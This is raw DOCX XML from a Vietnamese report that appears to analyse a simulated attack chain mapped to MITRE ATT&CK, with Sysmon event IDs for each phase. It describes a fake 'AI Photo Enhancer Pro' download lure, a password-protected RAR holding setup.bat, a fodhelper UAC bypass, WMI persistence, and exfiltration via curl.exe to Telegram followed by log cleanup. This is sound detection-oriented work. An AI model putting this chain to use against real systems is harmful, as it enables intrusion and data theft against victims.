            <w:tcW w:w="119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1C39C0B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1566.002 + T1204.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2065"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845FF1B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Phishing Link + Malicious File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="215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0586F9F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fake website → RAR password → setup.bat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="186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BBF052B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N/A (browser)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="7E6D9718" w14:textId="77777777" w:rsidTr="00A91F30">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="391"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DEAF332" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="136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9808AD9" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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35B7DD3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2065"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7F6DD13" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VBScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="215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48BD813" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>r.vbs proxy → powershell.exe hidden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="186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3ED3741" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="04EADE28" w14:textId="77777777" w:rsidTr="00A91F30">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="391"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D4A75CB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="136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C95D32C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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AD32470" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1548.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2065"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129B447" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UAC Bypass via Fodhelper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="215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7F5EE98" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ms-settings hijack → fodhelper.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="186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0CF1F26" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 1, 13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="2824DF06" w14:textId="77777777" w:rsidTr="00A91F30">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="391"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15966D8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="136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DCB3CCB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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8E806CC" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1546.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2065"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8598BCA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WMI Event Subscription</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="215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E548964" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NotepadFilter + SystemDumpConsumer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="186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C27A655" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 19, 20, 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="12EA2217" w14:textId="77777777" w:rsidTr="00A91F30">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="391"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98CC259" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="136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80889A8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Discovery &amp; Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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A95A3C9" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1082 + T1016 + T1005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2065"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9B920DF" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>System Info + Net + Local Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="215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E2EF675" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>arp.exe, Get-WmiObject, Copy-Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="186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AB1D29F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 1, 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="476B82E6" w14:textId="77777777" w:rsidTr="00A91F30">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="391"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B2A7771" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="136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734EE88" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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4AFD85B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1560.001 + T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2065"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90C0C0E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Archive + C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="215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E372543" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Compress-Archive → curl.exe → Telegram</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="186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49D73AD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 11, 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="1BC1C043" w14:textId="77777777" w:rsidTr="00A91F30">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="391"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2897D3D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="136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F962BCE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="119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F1B62D7" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1070.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2065"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8ABBD55" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Indicator Removal on Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="215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F8B16A8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remove-Item, Clear-Content PS history</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="186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5F10E63" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49EF0C3A" w14:textId="77777777" w:rsidR="00A91F30" w:rsidRDefault="00A91F30" w:rsidP="00A91F30">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F625620" wp14:editId="0BA1CE71">
            <wp:extent cx="6120130" cy="4729480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="104721414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14143"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120130" cy="4729480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F98B13" w14:textId="1AB02091" w:rsidR="00B01B4A" w:rsidRDefault="00A91F30" w:rsidP="00A91F30">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r w:rsidRPr="00697D59">
        <w:t>Layer view MITRE ATT&amp;CK Navigator hiển thị tất cả techniques được sử dụng trong attack chain</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CED857" w14:textId="77777777" w:rsidR="00A91F30" w:rsidRDefault="00A91F30">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0039D9B3" w14:textId="097D6C45" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 Logic Liên Kết Giữa Các Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46614C71" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Mỗi phase tạo điều kiện tiên quyết cho phase tiếp theo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBE6F89" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Initial Access → nạn nhân chạy setup.bat với quyền user thông thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC98C86" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Execution → r.vbs tạo môi trường PowerShell hidden để setup.bat không cần quyền cao.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2820BB89" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Privilege Escalation → fodhelper nâng quyền Admin để payload.ps1 có thể ghi vào C:\Windows\Temp và cài WMI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC73BDB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Persistence → svhw.ps1 được cài vào WMI Consumer, sẽ tự động chạy khi trigger condition met.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1850062B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Discovery &amp; Collection → svhw.ps1 thu thập thông tin hệ thống và copy file nhạy cảm vào staging directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51096FA5" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Exfiltration → dữ liệu đã được nén thành ZIP và upload lên Telegram Bot trước khi cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720CE67A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Defense Evasion → xóa staging directory, ZIP, script payload và PS history để cản trở forensic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F2D8D8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4675C07E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>VII. PHÂN TÍCH TỪNG PHASE TẤN CÔNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E667C83" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 1 — Initial Access (T1566.002 + T1204.002)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01B4A" w14:paraId="34BB101A"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2CC38628" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Technique</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3FE7AD4" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1566.002 — Spearphishing Link; T1204.002 — User Execution: Malicious File</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="11CEAC6F"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07657D4E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Tactic</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B84D43A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0001 — Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="585A7E0A"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40B9DF5D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon Event ID</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5BABFBD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N/A — hành vi xảy ra tại browser, không có process creation trước khi chạy setup.bat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="161909DC"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22A2314F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log Source</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34A57D9" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Browser History / Proxy Logs (nếu có)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="68E027C1"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599BF138" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ECS Field chính</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E81E94E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N/A ở phase này</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="3EFD4B8E"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7A620FD2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mức độ nguy hiểm</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F05DD08" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium — risk_score: 47 (social engineering)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="164863A6" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7223A1B5" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Kẻ tấn công tạo trang web giả mạo phần mềm "AI Photo Enhancer Pro" với giao diện chuyên nghiệp bao gồm hình ảnh demo before/after. Khi nạn nhân click Download, một modal hiển thị file RAR cùng mật khẩu giải nén. Nạn nhân tự nhập mật khẩu và giải nén — gateway AV không thể scan nội dung RAR được mã hóa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFF84C1" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7494BE72" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Trang web phân phối (setup trên máy attacker):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095B0F8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python -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0570830C"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4860094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Modal trên trang web hiển thị:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275098D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File:     AIPhotoEnhancerPro_v2.5.rar (48.2 MB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A039AB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Password: enhance123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57522914"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05FEC7A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Sau khi giải nén, nạn nhân nhận được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3CF30F"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setup.bat    &lt;- payload chính</w:t>
      </w:r>
    </w:p>
